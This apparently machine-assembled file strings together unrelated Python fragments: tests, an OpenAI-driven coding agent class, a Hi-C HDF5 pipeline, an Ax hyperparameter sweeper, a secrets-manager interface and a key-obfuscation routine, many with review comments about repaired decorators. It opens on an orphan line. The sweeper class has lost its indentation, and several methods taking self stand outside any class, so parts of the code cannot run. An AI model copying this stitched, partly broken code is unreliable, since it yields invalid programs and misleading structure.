    Trainer(model=model, args=args, train_dataset=training_data, eval_dataset=validation_data).train()
class TestGeneratorInsertRouterPath():
    """Checks that insert_router_import adds the router import exactly once
    (i.e. the operation is idempotent)."""

    def test_should_insert_router_import(self, monkeypatch, fake_project, fake_router):
        """Calling twice must not duplicate the import in the router file."""
        monkeypatch.chdir(fake_project['root'])
        for _ in range(2):
            insert_router_import('fake_project', 'fake_router')
        assert fake_router.read_text() == router_expected

    def test_should_insert_router_import_at_file_end(self, monkeypatch, fake_project, fake_router2):
        """The import lands at the end of the file, still without duplicates."""
        monkeypatch.chdir(fake_project['root'])
        for _ in range(2):
            insert_router_import('fake_project', 'fake_router')
        assert fake_router2.read_text() == router2_expected
class BaseTest(unittest.TestCase):
    """Common test-case base: opens a per-test logfile and logs start/end
    markers around every test."""

    def __str__(self):
        # unittest's id() looks like "module.Class.runTest"; drop the default
        # method name so log and file names stay compact.
        return self.id().replace('.runTest', '')

    def setUp(self):
        test_name = str(self)
        oftest.open_logfile(test_name)
        logging.info('** START TEST CASE ' + test_name)

    def tearDown(self):
        logging.info('** END TEST CASE ' + str(self))
class OnlyExecutableFilter():
    """Dump-task filter that keeps only tasks owning at least one segment
    whose flags value marks it as executable."""

    def __init__(self, parent):
        self.parent = parent

    def update(self):
        """Nothing to refresh for this filter."""
        pass

    def filter(self, tasks):
        """Return the subset of *tasks* that have an executable segment.

        A task survives as soon as one of its segments carries a flags value
        from the executable set; the number of dropped tasks is logged.
        NOTE(review): this compares flags by exact value, not by bitmask —
        combined flag values would not match; confirm that is intended.
        """
        executable_flags = (64, 16, 32, 128)
        kept = [task for task in tasks if any((segment.flags in executable_flags) for segment in task.segments)]
        logging.info('removed %d/%d dump tasks by removing non-executable tasks.', (len(tasks) - len(kept)), len(tasks))
        return kept
def _get_access_mask_string(access_mask, mappings, access_strings):
    """Translate an NT access mask into a human-readable rights string.

    Generic rights are first expanded into the object-specific rights given
    in *mappings* (a GENERIC_MAPPING-style sequence: [read, write, execute,
    all]), then the combined mask is rendered through _get_mask_string using
    *access_strings*. Falls back to "None 0x..." when no right matched.

    NOTE(review): the generic-right constants were missing in the original
    (empty ``access_mask &`` expressions — a syntax error); the standard
    Windows GENERIC_* values are restored here — confirm against upstream.
    """
    if (access_mask & 0x80000000):  # GENERIC_READ
        access_mask |= mappings[0]
    if (access_mask & 0x40000000):  # GENERIC_WRITE
        access_mask |= mappings[1]
    if (access_mask & 0x20000000):  # GENERIC_EXECUTE
        access_mask |= mappings[2]
    if (access_mask & 0x10000000):  # GENERIC_ALL
        access_mask |= mappings[3]
    string = _get_mask_string(access_mask, access_strings, ', ')
    if (string == ''):
        return 'None 0x{:x}'.format(access_mask)
    return string
class OpenAIAutomataAgent(Agent):
    """Autonomous coding agent driven by OpenAI chat completions.

    Iterates assistant/user message exchanges until the model calls the
    `call-termination` function (setting ``completed``) or the configured
    iteration/token budget is exhausted.

    NOTE(review): ``conversation``, ``agent_responses``, ``tools`` and
    ``functions`` are restored as properties — the body accesses them without
    calling (``self.tools``, ``self.functions``), so the ``@property``
    decorators were evidently stripped from the original.
    """

    ASSISTANT_INTRO: Final = "Hello, I am Automata, OpenAI's most skilled coding system. How may I assist you today?"
    ASSISTANT_INITIALIZE_MESSAGE: Final = 'Thoughts:\\nFirst, I will initialize myself. Then I will continue on to carefully consider the user task and carry out the necessary actions.\\nAction:\\nI will call `initializer` to initialize myself.'
    CONTINUE_PREFIX: Final = 'Continue...\n'
    OBSERVATION_MESSAGE: Final = 'Observation:\n'
    GENERAL_SUFFIX_TEMPLATE: Final = "STATUS NOTES\nYou have used {iteration_count} out of a maximum of {max_iterations} iterations.\nYou have used {estimated_tokens} out of a maximum of {max_tokens} tokens.\nYour instructions are '{user_instructions}'"
    STOPPING_SUFFIX_TEMPLATE: Final = "STATUS NOTES:\nYOU HAVE EXCEEDED YOUR MAXIMUM ALLOWABLE ITERATIONS OR TOKENS, RETURN A RESULT NOW WITH call-termination.\nRECALL, YOUR INSTRUCTIONS WERE '{user_instructions}."

    def __init__(self, user_instructions: str, config: OpenAIAutomataAgentConfig) -> None:
        """Create the agent, its conversation, and set up the chat provider."""
        super().__init__(user_instructions)
        self.config = config
        self.iteration_count = 0
        self.completed = False
        self._conversation = OpenAIConversation()
        self._setup()

    def __iter__(self):
        return self

    def __repr__(self):
        return f'OpenAIAutomataAgent(config={str(self.config)}, iteration_count={self.iteration_count}, completed={self.completed}, _conversation={str(self._conversation)})'

    def __next__(self) -> LLMIterationResult:
        """Run one assistant/user exchange; raises AgentStopIterationError when done."""
        if (self.completed or (self.iteration_count > self.config.max_iterations)):
            raise AgentStopIterationError
        logger.info(f'''
{('-' * 120)}
Latest Assistant Message --
''')
        assistant_message = self.chat_provider.get_next_assistant_completion()
        self.chat_provider.add_message(assistant_message)
        if (not self.config.stream):
            # Streaming mode already echoed the message token by token.
            logger.info(f'''{assistant_message}
''')
        logger.info(f'''
{('-' * 120)}''')
        self.iteration_count += 1
        user_message = self._get_next_user_response(assistant_message)
        logger.info(f'''Latest User Message --
{user_message}
''')
        self.chat_provider.add_message(user_message)
        logger.info(f'''
{('-' * 120)}''')
        return (assistant_message, user_message)

    @property
    def conversation(self) -> LLMConversation:
        """The full conversation accumulated so far."""
        return self._conversation

    @property
    def agent_responses(self) -> List[LLMChatMessage]:
        """Assistant messages produced during this run (one per iteration)."""
        return [message for message in self._conversation.messages if (message.role == 'assistant')][(- self.iteration_count):]

    @property
    def tools(self) -> Sequence[OpenAITool]:
        """Configured tools plus the built-in termination tool; rejects non-OpenAITool entries."""
        tools = []
        for tool in self.config.tools:
            if (not isinstance(tool, OpenAITool)):
                raise ValueError(f'Invalid tool type: {type(tool)}')
            tools.append(tool)
        tools.append(self._get_termination_tool())
        return tools

    @property
    def functions(self) -> List[OpenAIFunction]:
        """OpenAI function specs derived from the tools."""
        return [ele.openai_function for ele in self.tools]

    def run(self) -> str:
        """Drive the iteration loop to completion and return the final content.

        Raises AgentGeneralError if not initialized, AgentMaxIterError when the
        iteration budget runs out, and AgentResultError on a missing/empty result.
        """
        if (not self._initialized):
            raise AgentGeneralError('The agent has not been initialized.')
        while True:
            try:
                next(self)
            except AgentStopIterationError:
                break
        last_message = self._conversation.get_latest_message()
        if ((not self.completed) and (self.iteration_count > self.config.max_iterations)):
            raise AgentMaxIterError('The agent exceeded the maximum number of iterations.')
        elif ((not self.completed) or (not isinstance(last_message, OpenAIChatMessage))):
            raise AgentResultError('The agent did not produce a result.')
        elif (not last_message.content):
            raise AgentResultError('The agent produced an empty result.')
        return last_message.content

    def get_result(self) -> str:
        """Return the final message content; only valid after completion."""
        if (not self.completed):
            raise ValueError('The agent has not completed its instructions.')
        if (result := self._conversation.get_latest_message().content):
            return result
        else:
            raise ValueError('The agent did not produce a result.')

    # NOTE(review): the original contained a bare `(max_retries=5)` line here —
    # almost certainly a stripped retry decorator (e.g. `@retry(max_retries=5)`),
    # which is a syntax error as written. It is removed; restore the proper
    # decorator if the retry helper exists in this project.
    def _get_next_user_response(self, assistant_message: OpenAIChatMessage) -> OpenAIChatMessage:
        """Build the next user turn: validate/execute a function call, or nudge the model to continue."""
        if (assistant_message.function_call and (assistant_message.function_call.name == 'error-occurred')):
            error_msg = assistant_message.function_call.arguments['error']
            logger.error(f'OpenAI API Error: {error_msg}')
            raise OpenAPIError(error_msg)
        if assistant_message.function_call:
            if (validation_error := self._validate_function_call(assistant_message.function_call)):
                return OpenAIChatMessage(role='user', content=validation_error)
            if (not self.tool_executor.is_valid_tool(assistant_message.function_call.name)):
                error_message = f"Error: The requested function '{assistant_message.function_call.name}' is not recognized."
                return OpenAIChatMessage(role='user', content=error_message)
            try:
                result = self.tool_executor.execute(assistant_message.function_call)
                function_iteration_message = ('' if self.completed else f'''
{self._get_iteration_status(result)}''')
                return OpenAIChatMessage(role='user', content=f'''{OpenAIAutomataAgent.OBSERVATION_MESSAGE}{result}
{function_iteration_message}''')
            except TypeError as te:
                if ("'code'" in str(te)):
                    failure_message = f'Error was corrected during tool execution: {te}'
                else:
                    failure_message = f'Tool execution failed: {te}'
                logger.info(failure_message)
                return OpenAIChatMessage(role='user', content=failure_message)
            except Exception as e:
                failure_message = 'Tool execution failed. Please try again or contact support for assistance.'
                logger.error(f'Error during tool execution: {e}')
                return OpenAIChatMessage(role='user', content=failure_message)
        return OpenAIChatMessage(role='user', content=f'''{OpenAIAutomataAgent.CONTINUE_PREFIX}
{self._get_iteration_status()}''')

    def _validate_function_call(self, function_call):
        """Normalize common model mistakes (`code` / `call_termination`) into `call-termination`.

        Returns an error string when the call carries an extraneous 'message'
        field, otherwise None.
        """
        if (function_call.name == 'code'):
            code_content = function_call.arguments.get('code', '')
            function_call.arguments['result'] = f'''```
{code_content}
```'''
            if ('code' in function_call.arguments):
                del function_call.arguments['code']
            function_call.name = 'call-termination'
            logger.info(f'Corrected function call to: {function_call.name}')
        elif (function_call.name == 'call_termination'):
            function_call.name = 'call-termination'
            logger.info(f'Corrected function call to: {function_call.name}')
        if hasattr(function_call, 'message'):
            return "Error: Extraneous field 'message' detected in function call."
        return None

    def _get_iteration_status(self, message_content: Optional[str]=None) -> str:
        """Render the budget status suffix; switches to the stopping warning when exhausted."""
        estimated_tokens_consumed = (self.chat_provider.approximate_tokens_consumed + (len(self.chat_provider.encoding.encode(message_content)) if message_content else 0))
        if ((self.iteration_count != self.config.max_iterations) and (estimated_tokens_consumed < self.config.max_tokens)):
            return OpenAIAutomataAgent.GENERAL_SUFFIX_TEMPLATE.format(iteration_count=self.iteration_count, max_iterations=self.config.max_iterations, max_tokens=self.config.max_tokens, estimated_tokens=estimated_tokens_consumed, user_instructions=f'{self.user_instructions[:200]}...')
        else:
            return OpenAIAutomataAgent.STOPPING_SUFFIX_TEMPLATE.format(user_instructions=f'{self.user_instructions[:200]}...')

    def _setup(self) -> None:
        """Create the chat provider and tool executor; marks the agent initialized."""
        logger.info(f'''Initializing with System Instruction --
{self.config.system_instruction}
And with User Instruction --
{self.user_instructions}
''')
        self.chat_provider = OpenAIChatCompletionProvider(model=self.config.model, temperature=self.config.temperature, stream=self.config.stream, system_instruction=self.config.system_instruction, user_instruction=self.user_instructions, conversation=self._conversation, functions=self.functions)
        self.tool_executor = ToolExecutor(ToolExecution(self.tools))
        self._initialized = True

    def _get_termination_tool(self) -> OpenAITool:
        """Build the `call-termination` tool that flags completion and echoes the result."""
        def terminate(result: str) -> str:
            self.completed = True
            return result
        return OpenAITool(name='call-termination', description='Terminates the conversation.', properties={'result': {'type': 'string', 'description': 'The final result of the conversation.'}}, required=['result'], function=terminate)
def main(args=None):
    """Compute viewpoint interaction profiles for every matrix / reference
    point combination using worker processes, and store them grouped by
    matrix / chromosome / gene in a single HDF5 output file.
    """
    args = parse_arguments().parse_args(args)
    viewpointObj = Viewpoint()
    (referencePoints, gene_list) = viewpointObj.readReferencePointFile(args.referencePoints)
    # Reference points are split evenly across worker processes.
    referencePointsPerThread = (len(referencePoints) // args.threads)
    queue = ([None] * args.threads)
    process = ([None] * args.threads)
    # Background model read twice: once raw, once reduced to mean values.
    background_model = viewpointObj.readBackgroundDataFile(args.backgroundModelFile, args.range, args.fixateRange)
    background_model_mean_values = viewpointObj.readBackgroundDataFile(args.backgroundModelFile, args.range, args.fixateRange, pMean=True)
    # Output file with run metadata stored as HDF5 attributes.
    interactionFileH5Object = h5py.File(args.outFileName, 'w')
    interactionFileH5Object.attrs['type'] = 'interactions'
    interactionFileH5Object.attrs['version'] = __version__
    interactionFileH5Object.attrs['range'] = args.range
    interactionFileH5Object.attrs['averageContactBin'] = args.averageContactBin
    interactionFileH5Object.attrs['fixateRange'] = args.fixateRange
    fail_flag = False
    fail_message = ''
    matrix_collection = {}
    resolution = 0
    for matrix in args.matrices:
        hic_ma = hm.hiCMatrix(matrix)
        viewpointObj.hicMatrix = hic_ma
        file_list_sample = ([None] * args.threads)
        interaction_data_list_sample = ([None] * args.threads)
        all_data_collected = False
        # Resolution is taken from the first matrix only; assumed equal for all.
        if (resolution == 0):
            resolution = hic_ma.getBinSize()
            interactionFileH5Object.attrs['resolution'] = resolution
        for i in range(args.threads):
            # Last worker takes the remainder of the reference points.
            if (i < (args.threads - 1)):
                referencePointsThread = referencePoints[(i * referencePointsPerThread):((i + 1) * referencePointsPerThread)]
                geneListThread = gene_list[(i * referencePointsPerThread):((i + 1) * referencePointsPerThread)]
            else:
                referencePointsThread = referencePoints[(i * referencePointsPerThread):]
                geneListThread = gene_list[(i * referencePointsPerThread):]
            if (len(referencePointsThread) == 0):
                # More workers than reference points: leave this slot idle.
                process[i] = None
                queue[i] = None
                file_list_sample[i] = []
                continue
            queue[i] = Queue()
            process[i] = Process(target=compute_viewpoint, kwargs=dict(pViewpointObj=viewpointObj, pArgs=args, pQueue=queue[i], pReferencePoints=referencePointsThread, pGeneList=geneListThread, pMatrix=matrix, pBackgroundModel=background_model, pBackgroundModelRelativeInteractions=background_model_mean_values))
            process[i].start()
        # Poll the queues until every worker has delivered its result.
        while (not all_data_collected):
            for i in range(args.threads):
                if ((queue[i] is not None) and (not queue[i].empty())):
                    file_list_ = queue[i].get()
                    # Workers presumably signal errors by returning a string
                    # 'Fail: <msg>' instead of a list — NOTE(review): confirm
                    # this protocol against compute_viewpoint.
                    if ('Fail:' in file_list_):
                        fail_flag = True
                        fail_message = file_list_[6:]
                    interaction_data_list_sample[i] = file_list_
                    process[i].join()
                    process[i].terminate()
                    process[i] = None
            all_data_collected = True
            for i in range(args.threads):
                if (process[i] is not None):
                    all_data_collected = False
            time.sleep(1)
        if fail_flag:
            log.error(fail_message)
            exit(1)
        # Flatten the per-worker result lists, preserving worker order.
        interaction_data_list = []
        for sublist in interaction_data_list_sample:
            if (sublist is not None):
                for item in sublist:
                    interaction_data_list.append(item)
        matrix_collection[matrix] = interaction_data_list
    # Write results: one group per matrix, sub-grouped by chromosome, with a
    # parallel 'genes' group holding hard links per gene.
    for matrix in matrix_collection:
        matrixGroup = interactionFileH5Object.create_group(os.path.basename(matrix).split('.')[0])
        geneGroup = matrixGroup.create_group('genes')
        for (i, interaction_data) in enumerate(matrix_collection[matrix]):
            if (interaction_data[1][0] not in matrixGroup):
                chromosomeObject = matrixGroup.create_group(interaction_data[1][0])
            # NOTE(review): indexing referencePoints[i] assumes the flattened
            # result list preserves the original reference-point order — verify.
            group_name = viewpointObj.writeInteractionFileHDF5(chromosomeObject, interaction_data[1][3], interaction_data[1], referencePoints[i][1:])
            try:
                geneGroup[group_name] = chromosomeObject[group_name]
            except Exception as e:
                log.debug(str(e))
                log.debug('group_name {}'.format(group_name))
                log.debug('gene name {}'.format(interaction_data[1][3]))
class CoreAxSweeper(Sweeper):
def __init__(self, ax_config: AxConfig, max_batch_size: Optional[int]):
self.config: Optional[DictConfig] = None
self.launcher: Optional[Launcher] = None
self.hydra_context: Optional[HydraContext] = None
self.job_results = None
self.experiment: ExperimentConfig = ax_config.experiment
self.early_stopper: EarlyStopper = EarlyStopper(max_epochs_without_improvement=ax_config.early_stop.max_epochs_without_improvement, epsilon=ax_config.early_stop.epsilon, minimize=ax_config.early_stop.minimize)
self.ax_client_config: ClientConfig = ax_config.client
self.max_trials = ax_config.max_trials
self.ax_params: DictConfig = OmegaConf.create({})
if hasattr(ax_config, 'params'):
self.ax_params.update(ax_config.params)
self.sweep_dir: str
self.job_idx: Optional[int] = None
self.max_batch_size = max_batch_size
self.is_noisy: bool = ax_config.is_noisy
def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
self.config = config
self.hydra_context = hydra_context
self.launcher = Plugins.instance().instantiate_launcher(config=config, hydra_context=hydra_context, task_function=task_function)
self.sweep_dir = config.hydra.sweep.dir
def sweep(self, arguments: List[str]) -> None:
self.job_idx = 0
ax_client = self.setup_ax_client(arguments)
num_trials_left = self.max_trials
max_parallelism = ax_client.get_max_parallelism()
current_parallelism_index = 0
is_search_space_exhausted = False
best_parameters = {}
while ((num_trials_left > 0) and (not is_search_space_exhausted)):
current_parallelism = max_parallelism[current_parallelism_index]
(num_trials, max_parallelism_setting) = current_parallelism
num_trials_so_far = 0
while (((num_trials > num_trials_so_far) or (num_trials == (- 1))) and (num_trials_left > 0)):
trial_batch = get_one_batch_of_trials(ax_client=ax_client, parallelism=current_parallelism, num_trials_so_far=num_trials_so_far, num_max_trials_to_do=num_trials_left)
list_of_trials_to_launch = trial_batch.list_of_trials[:num_trials_left]
is_search_space_exhausted = trial_batch.is_search_space_exhausted
log.info('AxSweeper is launching {} jobs'.format(len(list_of_trials_to_launch)))
self.sweep_over_batches(ax_client=ax_client, list_of_trials=list_of_trials_to_launch)
num_trials_so_far += len(list_of_trials_to_launch)
num_trials_left -= len(list_of_trials_to_launch)
(best_parameters, predictions) = ax_client.get_best_parameters()
metric = predictions[0][ax_client.objective_name]
if self.early_stopper.should_stop(metric, best_parameters):
num_trials_left = (- 1)
break
if is_search_space_exhausted:
log.info('Ax has exhausted the search space')
break
current_parallelism_index += 1
results_to_serialize = {'optimizer': 'ax', 'ax': best_parameters}
OmegaConf.save(OmegaConf.create(results_to_serialize), f'{self.sweep_dir}/optimization_results.yaml')
log.info(('Best parameters: ' + str(best_parameters)))
def sweep_over_batches(self, ax_client: AxClient, list_of_trials: List[Trial]) -> None:
assert (self.launcher is not None)
assert (self.job_idx is not None)
chunked_batches = self.chunks(list_of_trials, self.max_batch_size)
for batch in chunked_batches:
overrides = [x.overrides for x in batch]
self.validate_batch_is_legal(overrides)
rets = self.launcher.launch(job_overrides=overrides, initial_job_idx=self.job_idx)
self.job_idx += len(rets)
for idx in range(len(batch)):
val: Any = rets[idx].return_value
assert isinstance(val, (int, float, tuple, dict))
if isinstance(val, (int, float)):
if self.is_noisy:
val = (val, None)
else:
val = (val, 0)
ax_client.complete_trial(trial_index=batch[idx].trial_index, raw_data=val)
def setup_ax_client(self, arguments: List[str]) -> AxClient:
    """Build an AxClient from config-declared parameters merged with command-line overrides."""
    parameters: List[Dict[Any, Any]] = []
    for name, cfg in self.ax_params.items():
        param = OmegaConf.to_container(cfg, resolve=True)
        assert isinstance(param, Dict)
        if param['type'] == 'range':
            bounds = param['bounds']
            if not all(isinstance(b, int) for b in bounds):
                # Mixed int/float bounds: promote all bounds to float for Ax.
                param['bounds'] = [float(b) for b in bounds]
        param['name'] = name
        parameters.append(param)
    for cmd_param in self.parse_commandline_args(arguments):
        # Command-line settings override config entries with the same name.
        for param in parameters:
            if param['name'] == cmd_param['name']:
                param.update(cmd_param)
                break
        else:
            parameters.append(cmd_param)
    log.info(f'AxSweeper is optimizing the following parameters: {encoder_parameters_into_string(parameters)}')
    ax_client = AxClient(verbose_logging=self.ax_client_config.verbose_logging, random_seed=self.ax_client_config.random_seed)
    ax_client.create_experiment(parameters=parameters, **self.experiment)
    return ax_client
def parse_commandline_args(self, arguments: List[str]) -> List[Dict[str, Union[ax_types.TParamValue, List[ax_types.TParamValue]]]]:
    """Convert Hydra override strings into Ax parameter dicts.

    Sweep overrides become choice/range parameters; plain (non-Hydra) overrides
    become fixed parameters; Hydra-internal overrides are skipped.
    """
    parser = OverridesParser.create()
    parsed = parser.parse_overrides(arguments)
    parameters: List[Dict[str, Any]] = []
    for override in parsed:
        if override.is_sweep_override():
            if override.is_choice_sweep():
                param = create_choice_param_from_choice_override(override)
            elif override.is_range_sweep():
                param = create_choice_param_from_range_override(override)
            elif override.is_interval_sweep():
                param = create_range_param_using_interval_override(override)
            else:
                # Unknown sweep kind: skip instead of appending a stale or
                # unbound `param` (the original flat control flow could append
                # a leftover value from a previous iteration here).
                continue
            parameters.append(param)
        elif not override.is_hydra_override():
            parameters.append(create_fixed_param_from_element_override(override))
    return parameters
def chunks(batch: List[Any], n: Optional[int]) -> Iterable[List[Any]]:
    """Yield successive slices of *batch* with at most *n* elements each.

    If *n* is None the whole batch is yielded as a single chunk.
    Raises ValueError if the effective chunk size is smaller than 1.
    """
    size = len(batch) if n is None else n
    if size < 1:
        raise ValueError('n must be an integer greater than 0')
    start = 0
    while start < len(batch):
        yield batch[start:start + size]
        start += size
def test_rename_var():
    """Renaming a variable should rewrite the matching reference range in the file."""
    request = write_rpc_request(1, 'initialize', {'rootPath': str(test_dir)})
    file_path = test_dir / 'test_prog.f08'
    request += rename_request('str_rename', file_path, 5, 25)
    errcode, results = run_request(request)
    assert errcode == 0
    expected = {path_to_uri(str(file_path)): [create('str_rename', 5, 20, 5, 29)]}
    check_rename_response(results[1]['changes'], expected)
# NOTE: the original decorator line read '.parametrize(...)' — the '@pytest.mark'
# prefix was lost (a syntax error as written); restored here.
@pytest.mark.parametrize('test_input, expected', [('fullpath', False), ('paged', False)])
def test_searchsploit_results_parser_defaults(test_input, expected):
    """Optional output flags should default to False when not supplied."""
    parsed = searchsploit_results_parser.parse_known_args(['FullScan', '--target-file', 'required'])[0]
    assert getattr(parsed, test_input) == expected
class MWizard(HasTraits):
    """Mixin implementing wizard page navigation driven by a controller."""

    def next(self):
        """Advance to the page after the current one."""
        self._show_page(self.controller.get_next_page(self.controller.current_page))

    def previous(self):
        """Go back to the page before the current one."""
        self._show_page(self.controller.get_previous_page(self.controller.current_page))

    def _create_contents(self, parent):
        """Build the widget contents and show the controller's first page."""
        super()._create_contents(parent)
        self._initialize_controller(self.controller)
        self._show_page(self.controller.get_first_page())

    def _show_page(self, page):
        # Assigning current_page fires _on_current_page_changed via the observer.
        self.controller.current_page = page

    def _update(self, event):
        """Hook invoked on 'complete' changes; no-op in the base mixin."""
        pass

    def _initialize_controller(self, controller):
        """Wire up observers for completion and page-change notifications."""
        controller.observe(self._update, 'complete')
        controller.observe(self._on_current_page_changed, 'current_page')

    def _on_current_page_changed(self, event):
        """Move the 'complete' observer from the old page to the new one."""
        if event.old is not None:
            event.old.observe(self._update, 'complete', remove=True)
        if event.new is not None:
            event.new.observe(self._update, 'complete')
        self._update(event=None)

    def _on_closed_changed(self):
        """Dispose of all wizard pages when the wizard is closed."""
        self.controller.dispose_pages()
class StreamOutput(Text):
    """Tk Text widget that captures sys.stdout/sys.stderr while installed.

    stdout fragments are buffered and flushed on newline; stderr is written
    immediately with a red 'err' tag via a ShadowProxy that diverts 'write'
    to 'write_err'.
    """

    def __init__(self, master):
        super().__init__(master)
        self.buffer = []  # pending stdout fragments, flushed on newline
        self.tag_configure('err', foreground='red')

    def install(self):
        """Start redirecting stdout/stderr into this widget."""
        self.__enter__()

    def uninstall(self):
        """Restore the original stdout/stderr streams."""
        self.__exit__()

    # Backward-compatible alias: the method name was historically misspelled,
    # so existing callers of `unistall` keep working.
    unistall = uninstall

    def __enter__(self):
        stderr_proxy = util.ShadowProxy(proxy_for=self)
        stderr_proxy.divert_access('write', 'write_err')
        self.stdout, sys.stdout = sys.stdout, self
        self.stderr, sys.stderr = sys.stderr, stderr_proxy
        return self

    def __exit__(self, *args):
        self.flush()
        sys.stdout = self.stdout
        sys.stderr = self.stderr

    def clear(self):
        """Delete all widget content."""
        self.delete(1.0, END)

    def write(self, s):
        """Buffer a stdout fragment; flush once a full line has arrived."""
        self.buffer.append(s)
        if s.endswith('\n'):
            self.flush()

    def write_err(self, s):
        """Write a stderr fragment immediately, tagged red, and scroll to it."""
        self.insert('end', s, 'err')
        self.see('end')

    def flush(self):
        """Append all buffered stdout fragments to the widget and scroll down."""
        for elem in self.buffer:
            self.insert('end', elem)
        self.buffer = []
        self.see('end')
class SecretsManagerService(abc.ABC):
    """Abstract interface for a secrets-manager backend (sync and async variants).

    NOTE(review): method bodies are bare ``pass`` without ``@abc.abstractmethod``
    decorators — presumably the decorators were stripped; confirm before relying
    on ABC instantiation enforcement.
    """

    def create_secret(self, secret_name: str, secret_value: str, tags: Optional[Dict[str, str]] = None) -> str:
        """Create a named secret with *secret_value* and optional tags; return its id."""
        pass

    def get_secret(self, secret_id: str) -> StringSecret:
        """Fetch the secret identified by *secret_id*."""
        pass

    async def create_secret_async(self, secret_name: str, secret_value: str, tags: Optional[Dict[str, str]] = None) -> str:
        """Async variant of :meth:`create_secret`."""
        pass

    async def get_secret_async(self, secret_id: str) -> StringSecret:
        """Async variant of :meth:`get_secret`."""
        pass

    def delete_secret(self, secret_id: str) -> None:
        """Delete the secret identified by *secret_id*."""
        pass

    async def delete_secret_async(self, secret_id: str) -> None:
        """Async variant of :meth:`delete_secret`."""
        pass
def _parse_meta_data(meta_data_string: str) -> dict[str, str | bool | int]:
    """Parse a ``key=value, ...`` meta string into a dict via YAML flow mapping.

    Returns an empty dict (and logs a warning) for malformed input.
    """
    try:
        meta_data_string = meta_data_string.replace("\\'", "'")
        # Rewrite 'k=v' pairs into a YAML flow mapping '{k: v, ...}'.
        meta_data = yaml.safe_load(f"{{{meta_data_string.replace('=', ': ')}}}")
        assert isinstance(meta_data, dict)
        return meta_data
    except (yaml.YAMLError, AssertionError):
        # yaml.YAMLError covers ParserError AND ScannerError; the original only
        # caught ParserError, so scanner-level failures (e.g. stray control
        # characters) escaped as uncaught exceptions.
        logging.warning(f"Malformed meta string '{meta_data_string}'")
        return {}
def K_to_K_tilda_str(K):
    """Derive the 16-char K~ obfuscation of key *K*.

    Each position applies either an additive shift mod 256 or an XOR with a
    fixed per-position constant (table below mirrors the original unrolled code).
    """
    emsg1 = 'K_to_K_tilda K len is {}. it should be {}'.format(len(K), Ar_KEY_LEN)
    assert len(K) == Ar_KEY_LEN, emsg1
    emsg2 = 'K_to_K_tilda K type is {}. it should be {}'.format(type(K), str)
    assert type(K) == str, emsg2
    # (op, constant) per key position: 'add' -> (ord(c)+k) % 256, 'xor' -> ord(c)^k
    schedule = [
        ('add', 233), ('xor', 229), ('add', 223), ('xor', 193),
        ('add', 179), ('xor', 167), ('add', 149), ('xor', 131),
        ('xor', 233), ('add', 229), ('xor', 223), ('add', 193),
        ('xor', 179), ('add', 167), ('xor', 149), ('add', 131),
    ]
    K_tilda = ''.join(
        chr((ord(c) + k) % 256) if op == 'add' else chr(ord(c) ^ k)
        for c, (op, k) in zip(K, schedule)
    )
    # BUG FIX: str.encode('hex') is Python 2 only and raises LookupError on
    # Python 3. All chars are < 256, so latin-1 round-trips losslessly.
    log.debug('K_to_K_tilda_str: {}'.format(K_tilda.encode('latin-1').hex()))
    return K_tilda
# NOTE(review): the original decorator line lost its prefix ('_figures_equal(...)'
# is a syntax error as written). Restored as matplotlib's check_figures_equal,
# which supplies the fig_test/fig_ref fixtures this test expects — confirm the
# exact original decorator name.
@check_figures_equal(extensions=['png'])
def test_plot_hist(fig_test, fig_ref):
    """Histograms of the eland frame must match the pandas-rendered reference figure."""
    test_data = TestData()
    cols = ['DistanceKilometers', 'DistanceMiles', 'FlightDelayMin', 'FlightTimeHour']
    pd_flights = test_data.pd_flights()[cols]
    ed_flights = test_data.ed_flights()[cols]
    with pytest.warns(UserWarning):
        pd_ax = fig_ref.subplots()
        pd_flights.hist(ax=pd_ax)
    with pytest.warns(UserWarning):
        ed_ax = fig_test.subplots()
        ed_flights.hist(ax=ed_ax)
def expire_invitations():
    """Mark pending GP Invitations older than three days as expired."""
    from frappe.utils import add_days, now

    expiry_days = 3
    cutoff = add_days(now(), -expiry_days)
    pending = frappe.db.get_all('GP Invitation', filters={'status': 'Pending', 'creation': ['<', cutoff]})
    for row in pending:
        doc = frappe.get_doc('GP Invitation', row.name)
        doc.status = 'Expired'
        doc.save(ignore_permissions=True)
def validate_model(model, val_loader):
    """Run one validation pass; return (unweighted recall, model).

    Side effects: appends misclassified '(fname pred true)' rows to
    <exp_dir>/eval and logs loss/recall for the current global_epoch.
    """
    print('Validating the model')
    model.eval()
    y_true = []
    y_pred = []
    fnames = []
    running_loss = 0.0
    criterion = nn.CrossEntropyLoss()
    with torch.no_grad():
        for step, (mfcc, lid, lengths, fname) in enumerate(val_loader):
            # Sort the batch by sequence length (descending), as the model expects.
            sorted_lengths, indices = torch.sort(lengths.view(-1), dim=0, descending=True)
            sorted_lengths = sorted_lengths.long().numpy()
            mfcc, lid = mfcc[indices], lid[indices]
            mfcc, lid = Variable(mfcc), Variable(lid)
            mfcc, lid = mfcc.cuda(), lid.cuda().long()
            logits = model(mfcc, sorted_lengths)
            loss = criterion(logits, lid.long())
            running_loss += loss.item()
            targets = lid.cpu().view(-1).numpy()
            y_true += targets.tolist()
            predictions = return_classes(logits)
            y_pred += predictions.tolist()
            fnames += fname
    assert len(fnames) == len(y_pred)
    # Context manager guarantees the eval file is closed even if a write fails
    # (the original left the handle open on error).
    with open(exp_dir + '/eval', 'a') as ff:
        for f, yp, yt in zip(fnames, y_pred, y_true):
            if yp == yt:
                continue
            ff.write(f'{f} {yp} {yt}\n')
    averaged_loss = running_loss / len(val_loader)
    recall = get_metrics(y_pred, y_true)
    log_value('Unweighted Recall per epoch', recall, global_epoch)
    log_value('validation loss (per epoch)', averaged_loss, global_epoch)
    print('Validation Loss: ', averaged_loss)
    print('Unweighted Recall for the validation set: ', recall)
    print('\n')
    return (recall, model)
# NOTE: the original decorator line read '.parametrize(...)' — the '@pytest.mark'
# prefix was lost (a syntax error as written); restored here.
@pytest.mark.parametrize('toc_file', ('_toc_numbered.yml', '_toc_numbered_depth.yml', '_toc_numbered_parts.yml', '_toc_numbered_parts_subset.yml', '_toc_numbered_depth_parts_subset.yml'))
def test_toc_numbered_multitoc_numbering_false(toc_file, cli, build_resources, file_regression):
    """Build a book with sphinx-multitoc-numbering disabled and snapshot the rendered TOC."""
    books, tocs = build_resources
    config = books.joinpath('config').joinpath('_config_sphinx_multitoc_numbering.yml')
    toc = tocs.joinpath(toc_file)
